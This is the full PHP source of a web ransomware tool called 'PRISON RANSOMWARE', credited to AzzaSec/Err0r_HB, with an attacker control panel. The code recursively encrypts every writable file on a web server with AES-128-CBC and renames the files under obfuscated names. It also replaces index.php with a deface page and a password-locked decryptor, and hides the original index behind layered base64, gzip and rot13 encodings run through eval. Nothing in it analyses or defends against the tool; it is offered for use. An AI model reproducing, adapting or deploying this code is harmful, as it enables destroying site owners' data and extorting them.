//* ##############################################################//* PRISON RANSOMWARE CODED BY AzzaSec//* Author : ./AzzaSec//* Github : https://github.com/Err0r-ICA//* Contact : errorhb@protonmail.com//* Greetz : All Defacers && Azzasec//* ##############################################################$filename = basename($_SERVER["PHP_SELF"]);set_time_limit(0);ini_set("memory_limit", "-1");error_reporting(0);// use dot(.) for extensions. you can change it anything you want :)$encrypt_eks = ".AzzaSec";// skipping encrypt this file! use | for delimiter .$blacklist = "$filename|index.php|azzasec.html|azz.php|Cyb3r.php|shell20211028.php|wzo.php|Cyb3r.html|.htaccess|.git|node_modules";class Encrypt{ private $encrypt_eks; private $blacklist; private $write_BlackList; public function __construct($encrypt_eks, $blacklist) { $this->encrypt_eks = $encrypt_eks; $this->blacklist = explode("|", $blacklist); $this->write_BlackList = $blacklist; if (file_exists($this->locate() . "/index.php")) { if (!is_writable($this->locate() . "/index.php")) { echo "<font color = 'red'>Can't run the ransom { index.php is not writeable! remove it manually or change the permissions! }</font>"; exit(); } } } private function flush() { flush(); ob_flush(); } private function kecuali($ext, $name) { for ($i = 0; $i < count($name); $i++) { $re = "/({$name[$i]})/"; preg_match($re, $ext, $matches); if ($matches[1]) { return false; } } return true; } public function locate() { return getcwd(); } public function encrypt_index() { $get = file_get_contents($this->locate() . "/index.php"); $convert = base64_encode( gzdeflate( str_rot13( rawurlencode( gzdeflate( convert_uuencode( base64_encode( str_rot13( gzdeflate( convert_uuencode( rawurldecode(str_rot13($get)) ) ) ) ) ) ) ) ) ) ); $fp = fopen("index.php", "w"); $open = [ "", '$index=', "'", $convert, "';", 'eval(str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($index)))))))))))));', ]; if (fwrite($fp, implode("\n\r", $open))) { echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Encrypting The Index Files Success!</font>)
'; } fclose($fp); } private function renameExt($locate, $dir, $d) { $encrypt = base64_encode(str_rot13(gzdeflate(str_rot13($d)))); $new_file = $dir . DIRECTORY_SEPARATOR . $encrypt; if (is_writable($locate)) { if (rename($locate, $new_file . $this->encrypt_eks)) { echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . "</font>
"; } else { echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="red">Failed! Do not know what happened :(</font>) <font color="#FF9800">|</font> ' . $locate . "
"; } } else { echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font> ' . $locate . "
"; } } public function cekDirectory($dir, $method, $key) { foreach (scandir($dir) as $d) { if ($d != "." && $d != "..") { $locate = $dir . DIRECTORY_SEPARATOR . $d; if ($this->kecuali($locate, $this->blacklist)) { if (is_writable($locate)) { if (!is_dir($locate)) { $this->spreadRansom($key, $locate, $method); $this->renameExt($locate, $dir, $d); } else { $this->cekDirectory($locate, $method, $key); } } else { if (!is_dir($locate)) { echo '<font color="#00BCD4">File ' . $locate . ' </font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font>
'; } else { echo '<font color="#00BCD4">Directory ' . $locate . ' </font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font>
'; } $this->cekDirectory($locate, $method, $key); } } } $this->flush(); } } public function DefaceIt($method, $key, $deface) { $secret_key = password_hash($key, PASSWORD_DEFAULT); if (file_exists("index.php")) { if (is_writable("index.php")) { rename("index.php", "index.php" . $this->encrypt_eks); } else { echo '<font color="#00BCD4">Index.php </font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>)'; } } $fp = fopen("index.php", "a+"); $open = [ //'', "// Can You Crack My Strongest Key ? HAHAHA", "", ]; $arr = ['$secret_key=', "'", $secret_key, "';"]; $list = ['$blacklist=', "'", $this->write_BlackList, "';"]; fwrite($fp, implode("\n\r", $open)); fwrite($fp, implode("", $arr)); fwrite($fp, implode("", $list)); $header = "Ly8qICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCi8vKgkJUkFOU09NV0FSRSBDT0RFRCBCWSAuL0VycjByX0hCICAgCQovLwkJQ29udGFjdDogZXJyb3JfaGJAcHJvdG9ubWFpbC5jb20KLy8qCQlHcmVldHogOiBBbGwgRGVmYWNlcnMgJiYgQXp6YXNlYwovLyogIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnNldF90aW1lX2xpbWl0KDApOwppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnLTEnKTsKZXJyb3JfcmVwb3J0aW5nKDApOwoKY2xhc3MgRGVjcnlwdAp7CiAgICBwcml2YXRlICRibGFja2xpc3Q7CgogICAgIHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkYmxhY2tsaXN0KQogICAgewogICAgICAgICR0aGlzLT5ibGFja2xpc3QgPSBleHBsb2RlKCJ8IiwkYmxhY2tsaXN0KTsKICAgIH0KCiAgICBwdWJsaWMgZnVuY3Rpb24ga2VjdWFsaSgkZXh0LCAkbmFtZSkKICAgIHsKICAgICAgICBmb3IoJGkgPSAwIDsgJGkgPCBjb3VudCgkbmFtZSk7ICRpKyspewogICAgICAgICAgICAkcmUgPSAiLyh7JG5hbWVbJGldfSkvIjsKICAgICAgICAgICAgcHJlZ19tYXRjaCgkcmUsICRleHQsICRtYXRjaGVzKTsKICAgICAgICAgICAgaWYgKCRtYXRjaGVzWzFdKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CgogICAgcHVibGljIGZ1bmN0aW9uIGxvY2F0ZSgpCiAgICB7CiAgICAgICAgcmV0dXJuIGdldGN3ZCgpOwogICAgfQoKICAgIHB1YmxpYyBmdW5jdGlvbiBmbHVzaCgpCiAgICB7CiAgICAgICAgZmx1c2goKTsKICAgICAgICBvYl9mbHVzaCgpOwogICAgfQ=="; $header2 = [ 'public function cekDirectory($dir, $key) { foreach (scandir($dir) as $d) { if ($d != "." && $d != "..") { $locate = $dir . DIRECTORY_SEPARATOR . $d; if ($this->kecuali($locate, $this->blacklist)) { if(is_writable($locate)){ if (!is_dir($locate)) { $this->DecryptRansom($key, $locate); $this->renameExt($locate, $dir, $d); } else { $this->cekDirectory($locate, $key); } } else{ if(!is_dir($locate)){ echo `<font color="#00BCD4">File $locate</font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font>
`; } else{ echo `<font color="#00BCD4">Directory $locate</font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font>
`; } } } } $this->flush(); } }', 'public function removeDeface() { if(file_exists("index.php")){ if(is_writable("index.php")){ unlink("index.php"); echo `<font color="#00BCD4">index.php removed</font> (<font color="#40CE08">ransom page successfuly decrypted</font>)
`; } else{ echo `<font color="#00BCD4">index.php removed</font> (<font color="#40CE08">ransom page successfuly decrypted</font>)
`; } } else{ } if(file_exists("index.php' . $this->encrypt_eks . '")) { if(is_writable("index.php' . $this->encrypt_eks . '")){ if(rename("index.php' . $this->encrypt_eks . '","index.php")){ echo `<font color="#00BCD4">index.php' . $this->encrypt_eks . '</font> (<font color="#40CE08">successfully recovered!</font>)
`; } } } }', ]; switch ($method) { case "1": $ransom_decrypt = "JGl2ID0gc3Vic3RyKCRkYXRhLCAwLCBtY3J5cHRfZ2V0X2l2X3NpemUoTUNSWVBUX1JJSk5EQUVMXzEyOCwgTUNSWVBUX01PREVfQ0JDKSk7DQogICAgICAgICRkZWNyeXB0ZWQgPSBydHJpbSgNCiAgICAgICAgICAgIG1jcnlwdF9kZWNyeXB0KA0KICAgICAgICAgICAgICAgIE1DUllQVF9SSUpOREFFTF8xMjgsDQogICAgICAgICAgICAgICAgaGFzaCgnc2hhMjU2JywgJGtleSwgdHJ1ZSksDQogICAgICAgICAgICAgICAgc3Vic3RyKCRkYXRhLCBtY3J5cHRfZ2V0X2l2X3NpemUoTUNSWVBUX1JJSk5EQUVMXzEyOCwgTUNSWVBUX01PREVfQ0JDKSksDQogICAgICAgICAgICAgICAgTUNSWVBUX01PREVfQ0JDLA0KICAgICAgICAgICAgICAgICRpdg0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgICJcMCINCiAgICAgICAgKTs="; break; case "2": $ransom_decrypt = "ICRpdmxlbiA9IG9wZW5zc2xfY2lwaGVyX2l2X2xlbmd0aCgkY2lwaGVyID0gIkFFUy0xMjgtQ0JDIik7DQogICAgICAgICAgICAgICAgJGl2ID0gc3Vic3RyKCRkYXRhLCAwLCAkaXZsZW4pOw0KICAgICAgICAgICAgICAgIHN1YnN0cigkZGF0YSwgJGl2bGVuLCAkc2hhMmxlbiA9IDMyKTsNCiAgICAgICAgICAgICAgICAkY2lwaGVydGV4dF9yYXcgPSBzdWJzdHIoJGRhdGEsICRpdmxlbiArICRzaGEybGVuKTsNCiAgICAgICAgICAgICAgICAkZGVjcnlwdGVkID0gcnRyaW0ob3BlbnNzbF9kZWNyeXB0KCRjaXBoZXJ0ZXh0X3JhdywgJGNpcGhlciwgJGtleSwgT1BFTlNTTF9SQVdfREFUQSwgJGl2KSwgIlwwIik7"; break; } $footer = "aWYoaXNfd3JpdGFibGUoJGxvY2F0ZSkpewogICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzKCRsb2NhdGUsICAkZGVjcnlwdGVkKSkgewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iIzAwQkNENCI+UmFuc29td2FyZSBEZWNyeXB0Li4uIDwvZm9udD4gKDxmb250IGNvbG9yPSIjNDBDRTA4Ij5TdWNjZXNzPC9mb250PikgPGZvbnQgY29sb3I9IiNGRjk4MDAiPnw8L2ZvbnQ+IDxmb250IGNvbG9yPSIjMjE5NkYzIj4nIC4gJGxvY2F0ZSAuICc8L2ZvbnQ+IDxicj4nOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSIjMDBCQ0Q0Ij5SYW5zb213YXJlIEZhaWxlZCB0byBEZWNyeXB0PC9mb250PiAoPGZvbnQgY29sb3I9InJlZCI+UG9zc2libGUgZGF0YSBjb3JydXB0ITwvZm9udD4pIDxmb250IGNvbG9yPSIjRkY5ODAwIj58PC9mb250PiA8Zm9udCBjb2xvcj0iIzIxOTZGMyI+JyAuICRsb2NhdGUgLiAnPC9mb250PiA8YnI+JzsKICAgICAgICB9Cn0gZWxzZXsKICAgIGVjaG8gJzxmb250IGNvbG9yPSIjMDBCQ0Q0Ij5SYW5zb213YXJlIEZhaWxlZCB0byBEZWNyeXB0PC9mb250PiAoPGZvbnQgY29sb3I9InJlZCI+RmlsZSBub3Qgd3JpdGVhYmxlISBQZXJtaXNzaW9uIERlbmllZCEgT3IgTm90IEVuY3J5cHRlZCBCZWZvcmU/IFNhZmUgQWN0aW9uLi4uIFNraXBwaW5nLi4uIDwvZm9udD4pIDxmb250IGNvbG9yPSIjRkY5ODAwIj58PC9mb250PiA8Zm9udCBjb2xvcj0iIzIxOTZGMyI+JyAuICRsb2NhdGUgLiAnPC9mb250PiA8YnI+JzsKfQoKICAgIH0KfQoKJGluaXQgPSBuZXcgRGVjcnlwdCgkYmxhY2tsaXN0KTsKCmlmIChpc3NldCgkX1BPU1RbJ3N1Ym1pdCddKSkgewogICAgJGtleSA9IHRyaW0oJF9QT1NUWydrZXknXSk7CiAgICBpZiAoJGtleSkgewogICAgICAgIC8vIERvbid0IHJlbW92ZSB0aGUgcGFzc3dvcmRfdmVyaWZ5IGZ1bmN0aW9uICEgCiAgICAgICAgaWYgKHBhc3N3b3JkX3ZlcmlmeSgka2V5LCAkc2VjcmV0X2tleSkpIHsKICAgICAgICAgICAgZWNobyAiPHNjcmlwdD5hbGVydCgnQ29uZ3JhdHMhIENvcnJlY3QgRGVjcnlwdGlvbiBLZXkhJyk8L3NjcmlwdD4iOwogICAgICAgICAgICAkaW5pdC0+Y2VrRGlyZWN0b3J5KCRpbml0LT5sb2NhdGUoKSwgJGtleSk7CiAgICAgICAgICAgICRpbml0LT5yZW1vdmVEZWZhY2UoKTsKICAgICAgICB9IGVsc2V7CiAgICAgICAgICAgIGVjaG8gIjxzY3JpcHQ+YWxlcnQoJ1dob29wei4gV3JvbmcgUGFzc3dvcmQuIFRha2UgYSBkZWVwIGJyZWF0aGUgYW5kIHRyeSBhZ2FpbiEnKTwvc2NyaXB0PiI7CiAgICAgICAgfQogICAgfSBlbHNlewogICAgICAgIGVjaG8gIjxzY3JpcHQ+YWxlcnQoJ0tleSBjYW5ub3QgYmUgZW1wdHkhJyk8L3NjcmlwdD4iOwogICAgfQp9Cgo/Pg=="; $decryptor = [ ' public function renameExt($locate, $dir, $d) { $locates = str_replace("' . $this->encrypt_eks . '", "", $d); $locates = str_rot13(gzinflate(str_rot13(base64_decode($locates)))); $new_file = $dir . DIRECTORY_SEPARATOR . $locates; if(is_writable($locate)){ if(rename($locate,$new_file)) { echo `<font color="#00BCD4">Decrypt Name File</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">$locate</font>
`; }else{ echo `<font color="#00BCD4">Decrypt Name File</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font>$locate
`; } } else{ echo `<font color="#00BCD4">Decrypt Name File...</font> (<font color="red">File not writeable! Permission Denied! Or Not Encrypted Before? Safe Action... Skipping... </font>) <font color="#FF9800">|</font>$locate
`; } }', 'public function DecryptRansom($key, $locate) {', ' $data = base64_decode(file_get_contents($locate));', base64_decode($ransom_decrypt), base64_decode($footer), ]; if (fwrite($fp, base64_decode($header))) { echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Header Decryptor Success!</font>)
'; } if (fwrite($fp, implode("\n\r", $header2))) { echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Header Decryptor 2 Success!</font>)
'; } if (fwrite($fp, implode("\n\r", $decryptor))) { echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Core Decryptor Success!</font>)
'; } if (fwrite($fp, $deface)) { echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Deface Page Success!</font>)
'; } fclose($fp); } private function spreadRansom($key, $locate, $method) { $data = chmod($locate, 0777); $data = file_get_contents($locate); switch ($method) { case "1": $iv = mcrypt_create_iv( mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM ); $encrypted = base64_encode( $iv . mcrypt_encrypt( MCRYPT_RIJNDAEL_128, hash("sha256", $key, true), $data, MCRYPT_MODE_CBC, $iv ) ); break; case "2": $ivlen = openssl_cipher_iv_length($cipher = "AES-128-CBC"); $iv = openssl_random_pseudo_bytes($ivlen); $ciphertext_raw = openssl_encrypt( $data, $cipher, $key, OPENSSL_RAW_DATA, $iv ); $hmac = hash_hmac("sha256", $ciphertext_raw, $key, true); $encrypted = base64_encode($iv . $hmac . $ciphertext_raw); break; } if (is_writable($locate)) { if (file_put_contents($locate, $encrypted)) { echo '<font color="#00BCD4">AES-128-CBC Ransom...</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . "</font>
"; } else { echo '<font color="#00BCD4">AES-128-CBC Ransom...</font> (<font color="red">Failed! Do not know what happen :(</font>) <font color="#FF9800">|</font> ' . $locate . "
"; } } else { echo '<font color="#00BCD4">AES-128-CBCRansom...</font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font> ' . $locate . "
"; } }}$init = new Encrypt($encrypt_eks, $blacklist);if (isset($_POST["submit"])) { $deface = trim($_POST["deface"]); $key = trim($_POST["key"]); $method = trim($_POST["method"]); if ($key) { if ($deface) { switch ($method) { case "1": if (version_compare(PHP_VERSION, "7.2.0", ">")) { echo "
<font color = red>Ransomware Mcrypt Only Support in PHP 5 . Use Ransomware OpenSSL instead of Ransomware Mcrypt </font> "; } break; } $init->cekDirectory($init->locate(), $method, $key); $init->DefaceIt($method, $key, $deface); $init->encrypt_index(); } }} <link rel="icon" type="image/gif" href="https://s-media-cache-ak0.pinimg.com/236x/a7/76/ec/a776ec52e575d0473d33557aa610e47d--skull-fashion-flower-tattoos.jpg"> <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'> ҳ̸Ҳ̸ҳ ./Err0r_HB Tr0jan Ransomware ҳ̸Ҳ̸ҳ <title> ҳ̸Ҳ̸ҳ ./Err0r_HB Tr0jan Ransomware ҳ̸Ҳ̸ҳ</title> <style type="text/css"> body { background: #00001a; color: #e2e2e2; } .selecte { border-color: lime; width: 300px; height: 30px; background-color: transparent; color: lime; } .inpute { width: 500px; height: 20px; border-color: #EA2A14; background-color: transparent; color: lime; text-align: center; } .submite { width: 200px; border-color: red; background-color: transparent; color: red; } textarea { border-color: #EA2A14; width: 100%; height: 400px; padding-left: 5px; margin: 10px auto; resize: none; background: transparent; color: #ffffff; font-size: 13px; } </style> <pre><font color = "lime">____________║▒▒▒▒▒▒▒▒▒▒║║▒▒▒▒▒▒▒▒▒▒║ ║▒▒▒▒▒▒▒▒▒▒║ <font color = "#008000">╔════════════╗ ╚════════════╝ <font color = "#ff1493">║<font color = "#FFFFFF">██████████<font color = "#ff1493">╚╗<font color = "#ff1493"> ║<font color = "#FFFFFF">██<font color = "#ff1493">╔══╗<font color = "#FFFFFF">█<font color = "#ff1493">╔═╗<font color = "#FFFFFF">█<font color = "#ff1493">║ <font color = "#ff1493">║<font color = "#FFFFFF">██<font color = "#ff1493">║<font color = "#20b2aa">╬<font color = "#ff1493">╔╝<font color = "#FFFFFF">█<font color = "#ff1493">╚╗║<font color = "#FFFFFF">█<font color = "#ff1493">║ <font color = "#ff1493"> ║<font color = "#FFFFFF">██<font color = "#ff1493">╚═╝<font color = "#FFFFFF">█<font color = "#ff1493">║<font color = "#FFFFFF">█<font color = "#ff1493">╚╝<font color = "#FFFFFF">█<font color = "#ff1493">║<font color = "lime"> PRISON <font color = "#ff1493"> ╚╗<font color = "#FFFFFF">█████████<font color = "#ff1493">═╝<font color = "lime"> RANSOMWARE <font color = "#ff1493"> ╚╗║╠╩╩╩╩╩╝<font color = "lime"> *ZzzZzZZzZzZZzz* <font color = "#ff1493">║║╚╗┈<font color = "#ffa07a">█<font color = "#FFFFFF">▐█████<font color = "">▒<font color = "#C0C0C0">.。oO<font color = "#ff1493">║<font color = "#FFFFFF">██<font color = "#ff1493">╠╦╦╦╗ <font color = "#ff1493"> ╚╗<font color = "#FFFFFF">██████<font color = "lime"> Author : *Err0r_HB* <font color = "#ff1493"> ╚════╝ <font color = "lime">Team : Azzasec <font color = "#20b2aa"><══════════════════════════════════> <font color = "lime"> -[ Contact : errorhb@protonmail.com ]- <font color = "Cyan">
System :
echo Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64 . "\n";
<font color = "#FFD700">#Ransomware is placed in [Dir]: <font color = "lime"> echo getcwd(); / echo basename($_SERVER["PHP_SELF"]) . "\n";
<font color = "#FFD700">#Ransomware Executing in [Dir]: <font color = "lime"> echo getcwd();
<font color = "#FFD700"> Note:
Recommended Use Ransom OpenSSL for Support All PHP Version
Ransom Mcrypt Only Support PHP 5 , DEPRECATED in PHP 7.1.0 and REMOVED in PHP 7.2.0
*Important : File Will not Be Encrypted (Check Blacklist Variable) :
echo $blacklist; </font> </pre> <font color='red' face='iceland'> Put Your Uncrackable Key Here Skidz
</font>
<img src="https://i.postimg.cc/NMqcrp2c/Picsart-24-05-11-06-36-32-329.jpg" alt="Logo" width="500" height="500">
<!-- do not remove this! after post method, if you refresh the page so it will not loop the encrypt function that cause data corrupt! ----><script> if (window.history.replaceState) { window.history.replaceState(null, null, window.location.href); }</script>